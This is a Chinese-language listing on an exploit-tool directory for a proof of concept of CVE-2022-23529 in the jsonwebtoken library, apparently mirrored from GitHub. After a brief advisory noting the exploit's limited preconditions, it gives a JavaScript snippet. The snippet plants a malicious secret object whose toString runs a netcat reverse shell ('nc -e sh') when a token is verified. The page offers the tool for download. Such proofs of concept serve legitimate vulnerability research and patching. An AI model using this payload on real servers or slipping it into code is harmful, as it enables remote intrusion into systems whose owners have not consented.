Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-23529-Exploration — CVE-2022-23529 的概念验证漏洞利用,演示通过恶意 HMAC 密钥对象在易受攻击的 JWT 库中实现 RCE。 | Kitploit
工具/GitHubGitHub/daniel-marchi/cve-2022-23529-exploration
漏洞分析漏洞利用Web安全渗透测试Payload 开发
GitHubdaniel-marchi/cve-2022-23529-exploration

CVE-2022-23529-Exploration

CVE-2022-23529 的概念验证漏洞利用,演示通过恶意 HMAC 密钥对象在易受攻击的 JWT 库中实现 RCE。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
3年前尚未审核
分享

CVE-2022-23529

3.4.6、4.0.4 和 4.1.5 之前的 JSON Web Token (JWT) 库版本存在 RCE 漏洞。

HMAC 哈希函数接受任意字符串作为输入,从而导致 RCE。

由于前提条件,该漏洞不太可能被利用。

要利用此漏洞,攻击者需要满足以下条件之一:

  • 服务器未安全存储密钥。
  • 攻击者需要能够访问并控制密钥。

npm install [email protected]

var jwt = require('jsonwebtoken');

使用服务器密钥创建令牌

var token = jwt.sign({"x":"y"}, 'servers_secret');

创建包含反向 Shell(node.js)的恶意对象

root@kitploit:~
var poisoned_secret_on_server = { 
    toString : ()=> {console.log('PWNED AFTER PASRSING TOKEN');
        process.on('exit', ()=> {
            require('child_process').exec('nc -e sh 127.0.0.1 9001');
        });
        process.exit(0)
    }
}

服务器使用存储为密钥的恶意对象验证令牌

jwt.verify(token, poisoned_secret_on_server);

下载工具